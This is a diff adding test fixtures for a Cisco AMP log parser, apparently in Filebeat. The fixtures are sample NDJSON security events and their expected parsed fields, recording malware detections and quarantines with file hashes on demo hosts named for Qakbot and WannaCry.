+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json new file mode 100644 index 000000000000..546e93300ef6 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json @@ -0,0 +1,2575 @@ +[ + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 96000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 0, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 862000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1522, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 659000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" 